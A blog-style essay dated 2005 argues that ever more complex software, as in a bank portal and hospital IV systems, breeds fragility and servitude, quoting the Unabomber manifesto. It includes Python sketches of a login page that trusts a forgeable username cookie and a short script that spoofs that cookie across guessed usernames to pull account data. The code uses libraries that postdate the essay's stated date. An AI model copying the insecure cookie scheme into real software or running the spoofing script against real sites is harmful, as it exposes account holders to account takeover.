A New Dystopian Vision

I’ve been thinking a lot lately about the course we are traveling on. This bright new century, ushered in with hype and promise, jolted awake by tragedy, then slowly rising, bleary-eyed, mildly confident, etcetera.

There’s the promise of a digital reawakening, the remaking of the media through bloggers and the internet, the morphing of media distribution, battles over intellectual property and copyright.

But a lot of people are missing the underlying infrastructure required to put all this together. Glossing over the details. Of course there’s the internet, with miles of wires, millions of routers and servers spitting out packets and requests. But all that code comes from somewhere – whether it’s a hardworking college grad weaving through spaghetti code or the hardworking offshore replacement doing the same.

But the internet is not magic. Maybe some of the content and behavior of the internet is emergent – but none of the code is. Every single line was either copied or written by hand. Integrated with legacy products, interfaced with various protocols and implementations.

The magic transparency of the internet appears because there are so many bodies and minds keeping it working. Server maintenance, upgrades. Memory leaks and power failures and glitches. Malicious hacker attacks. The magic of the internet requires armies of workers to keep it running smoothly.

Back when it was just HTML pages, GeoCities sites about summer camp, warez newsgroups, video dumps of porn – it wasn’t that big of a deal. So what if a server goes down or you get page errors? The internet was just a fun little toy, a novelty. Not everything worked all the time. It was the result of thousands of tinkerers and armchair architects – the flaws were part of the draw.

But now the net is bigtime. In every facet of industry – online stores, banking, billpay, data exchange, medical reference, investing. These are big industries with boatloads of money and a yearning to tap into the “ease” of network technologies.

But the ease is somewhat of a misnomer. A misconception.

Example: Let’s say I’m a software company hired to design a new online banking portal for a large international bank. I have my team of programmers, database experts, networking consultants, even banking execs who give me detailed specs on the system. Eighteen months later the thing is done and it’s a hit. The bank cuts operating costs by a noticeable percentage, investment is up, staffing costs are lowered, everyone is happy.

Then a hacker hits and steals 10,000 records of data. The hole is plugged, the bug fixed, but the damage is done – damage perhaps orders of magnitude larger than any bank robbery.

But let’s say the system was airtight – no way a hacker could get in and compromise the data. Things are going swell and Joey, the college intern, is hired to spruce up the login user interface. Most of it is ASP pages (maybe PHP if the bank is feeling open-source inclined), drawing the frames with a pretty style sheet, forwarding the login data to a database stored procedure. Elementary stuff.
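
For concreteness, here’s a minimal sketch of that kind of login page – in Python with Flask and pyodbc rather than the ASP of the example, and with made-up names like `sp_validate_login` and the `DSN=bankdb` connection string standing in for whatever the bank actually uses:

```python
# A rough sketch of the login page Joey is hired to spruce up. Python/Flask
# stands in for the ASP of the example; the DSN and stored procedure name
# are hypothetical placeholders.
import pyodbc
from flask import Flask, request, render_template_string

app = Flask(__name__)

LOGIN_FORM = """
<form method="post">
  <input name="username"> <input name="password" type="password">
  <button>Log in</button>
</form>
"""

def credentials_ok(username, password):
    """Forward the login data to a database stored procedure."""
    conn = pyodbc.connect("DSN=bankdb")  # hypothetical connection string
    cur = conn.cursor()
    cur.execute("{CALL sp_validate_login (?, ?)}", username, password)
    return cur.fetchone() is not None

@app.route("/login", methods=["GET", "POST"])
def login():
    if request.method == "POST":
        if credentials_ok(request.form["username"], request.form["password"]):
            return "Welcome to your accounts."
        return "Login failed.", 401
    return render_template_string(LOGIN_FORM)  # the pretty style sheet lives here
```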

After his manager goes home, Joey decides to get extracurricular and add a nice feature – a cookie to remember the login information. He looks up some basic code on Google for remembering passwords through cookies, implements the change in a few hours, pushes the update to the live system, emails his manager, and clocks out.
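
In the same hypothetical sketch, Joey’s shortcut might look something like this – the bare account name dropped into a plain cookie that the server then trusts outright, with no signature, no expiry, and no server-side check. The route and cookie names are invented; the mistake is the classic one a quick Google search will hand you:

```python
# Joey's after-hours "feature", bolted onto the previous sketch: remember the
# login by writing the bare username into a client-controlled cookie, then
# trust that cookie outright on the next visit.
from flask import make_response, redirect

@app.route("/login-remember", methods=["POST"])
def login_and_remember():
    username = request.form["username"]
    if credentials_ok(username, request.form["password"]):
        resp = make_response(redirect("/accounts"))
        # The whole "scheme": a forgeable, client-controlled cookie.
        resp.set_cookie("remembered_user", username)
        return resp
    return "Login failed.", 401

@app.route("/accounts")
def accounts():
    user = request.cookies.get("remembered_user")
    if user:  # anyone presenting this cookie is "logged in" as that user
        return "Account summary for " + user
    return redirect("/login")
```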

That night a 16-year-old Russian kid figures out the cookie scheme, jots out a short post on his private IRC channel, and within five hours another 10,000 records are lost via cookie spoofing.
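
The attack side of that sketch needs nothing clever – no password, no exploit, just a forged cookie. A rough illustration, with a made-up portal URL and username list:

```python
# Cookie spoofing against the sketch above: present someone else's username
# in the "remembered_user" cookie and the server happily serves their data.
# The URL and the usernames are invented for illustration.
import requests

TARGET = "https://bank.example.com/accounts"    # hypothetical portal
for guess in ["jsmith", "mgarcia", "achen"]:    # or a dictionary of thousands
    page = requests.get(TARGET, cookies={"remembered_user": guess})
    if "Account summary" in page.text:
        print("pulled records for", guess)
```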

Of course, this is an extreme example. Any bank that lets dumb college interns named Joey mess with live production code deserves to have its system compromised.

But the only solution is more diligence. More experienced workers, putting in more hours, creating more code-handling bureaucracy and more policies of operation.

Like the butterfly effect – the smallest change/glitch/problem can be magnified in a large complex system. The catch-22 is this: As systems become more complex, they require more diligence and expertise to maintain, leading to yet more complexity.

As we become more tied into the system – each and every failure of the system hurts us more. When a horny middle school kid couldn’t find the latest Playboy scans, no one died. But when the router code that handles the messaging of medical devices has a logic error – people could die. Look at the Therac-25. That’s a single machine that was running a single piece of code. It wasn’t on a network. This was back in 1986. It’s 2005 and we still have momentous software glitches and errors: in the medical industry, in banking, in personal data, in entertainment.

And that’s the nightmare. As these technologies become more and more integrated into our lives, the problems will dig even deeper. Either we will suffer or the programmers will suffer. In very intricate systems, these bugs can be solved by only one or two people – the experts of the code.

Spaghetti code is unrecoverable – it must be recreated from scratch to remove cruft, bloat, glitches and holes. Remaking our information infrastructure every two to five years is an enormous undertaking. For every flaw that is discovered during the redesign, more are bound to pop up. Our brains just aren’t wired to encompass every detail of computer code. Mistakes are bound to be made.

That’s why I’m wary of those who see information technology growing exponentially, eventually to explode into some sort of Singularity. They’re the technologists, the futurists, the transhumanists. It’s an interesting creed. “Eventually our brilliance will become as bright as the sun, and we will become gods.”

Keep dreaming. As someone down in the trenches, I’m beginning to envision something more closely resembling this Luddite’s prophecies. Aside from his predilection for mountain cabins and pipe bombs, the Unabomber had some interesting things to say in his manifesto:

> 115. The system HAS TO force people to behave in ways that are increasingly remote from the natural pattern of human behavior. For example, the system needs scientists, mathematicians and engineers. It can't function without them. So heavy pressure is put on children to excel in these fields. It isn't natural for an adolescent human being to spend the bulk of his time sitting at a desk absorbed in study. A normal adolescent wants to spend his time in active contact with the real world. Among primitive peoples the things that children are trained to do are in natural harmony with natural human impulses. Among the American Indians, for example, boys were trained in active outdoor pursuits -- just the sort of things that boys like. But in our society children are pushed into studying technical subjects, which most do grudgingly.

As our society and its needs become increasingly abstracted, human impulses and intuition will grow less effective at solving problems. In dealing with a physical world and biological needs, our impulses are useful – we use our five senses and reasoning power to directly affect our situation.

In effect, as systems take over more of our daily lives, we must jump through hoops and perform mathematical feats to accomplish the same things. Unless the loss of this “intuitive gift” can be rectified, humans are required to “brute force” problems. This severely hampers the promise of any exponential growth or progress. The attrition is killer.

**Homogeneity leads to infection**: if a single system is made to handle everything, a single bug will infect everything.

**Heterogeneity leads to interfacing problems**: for every system that must interact, overhead is required – in time, manpower, and infrastructure.

That is the dilemma of innovation.

**Here’s another example**: A very intelligent, driven and dedicated young man designs software to handle all the medical machinery of a hospital. Specifically, the part of the software he wrote handles the dosage of IV drips and medical readouts. He carries a BlackBerry to stay in constant communication with the hospital (and his programmer staff) if problems arise. He can remotely change the code from his laptop, at home or out of town. He makes, without a doubt, serious fuck-you money.

But he also carries chains and manacles – his laptop and cellphone. Essentially he works twenty-four-hour days. His work is always on his mind, and he must always be prepared to perform intellectual gymnastics to debug a problem (under time pressure) and get things working again.

If he fails, not only will he lose his money and his company, he’ll be fined thousands or even millions for endangering medical patients.

Is this really making life easier? Is this really the bright-eyed world of the future? Or is it a desperate future, a hint of the dystopia yet to come – servitude to the intricate architecture of the circuit board, slave to miles of code and the chaos held within?